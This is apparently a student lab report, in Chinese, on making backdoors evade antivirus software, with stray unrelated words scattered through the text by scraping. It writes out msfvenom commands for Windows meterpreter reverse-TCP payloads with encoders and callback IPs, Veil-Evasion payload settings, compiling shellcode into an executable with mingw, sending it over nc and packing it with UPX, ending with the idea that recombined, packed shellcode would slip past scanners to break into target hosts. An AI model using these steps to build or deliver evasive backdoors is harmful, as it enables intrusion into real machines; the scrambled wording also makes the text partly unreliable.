免殺是作什麼?python
惡意代碼避免殺毒軟件查殺,從而實現入侵。免殺的基本方法有哪些?shell
將實驗二中生成的後門程序上傳到virscan中進行掃描,掃描信息及結果以下:
windows
根據掃描結果,有48%的殺軟檢測出了病毒。數組
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=192.168.204.128 LPORT=5330 -f exe > 5330exp3.exe
生成一次編碼過的可執行文件掃描文件,仍是被那麼多的殺軟查殺到,那麼屢次編碼好像也沒有太大的做用。
網絡
veil-evasion
命令打開該軟件。use python/meterpreter/rev_tcp //設置payload set LHOST 192.168.204.138 //設置反彈鏈接win-IP set port 443 //設置反彈端口443,默認爲4444 generate //生成 5330 //程序名 1
從路徑/var/lib/veil-evasion/output/compiled
找到相應程序,放到網站上掃描,結果以下:
tcp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=Kali-IP LPORT=443 -f c
,生成一個C語言數組。touch
命令生成):MSSC_5330.c(免殺shellcode),將上面生成的數組copy到該文件下,並加入一個主函數。i686-w64-mingw32-g++ MSSC_5330.c -o MSSC_5330.exe
命令將該C語言代碼轉換爲一個可在64位windows系統下操做的可執行文件MSSC_5330.exe。經過nc
命令將可執行文件傳到win7主機上,很快就被查殺了QAQ。
函數
upx #須要加殼的文件名 -o #加殼後的文件名
,生成程序。過了一會,又被查殺了TUT。
網站
應該是對編寫免殺代碼還不太瞭解,以目前的能力還只能依靠軟件來生成代碼,若是是純手工的代碼可能免殺的概率會更大一些。編碼
經過不一樣的方式對惡意代碼生成病毒程序有了必定的瞭解,能夠簡單製做出一些免殺後門。從而也瞭解到了目前咱們所信賴的殺軟其實仍是存在着一些漏洞,假設將shellcode進行從新組合再加殼的話,免殺率應該還會再上升,從而經過殺軟的掃描,入侵靶機。3d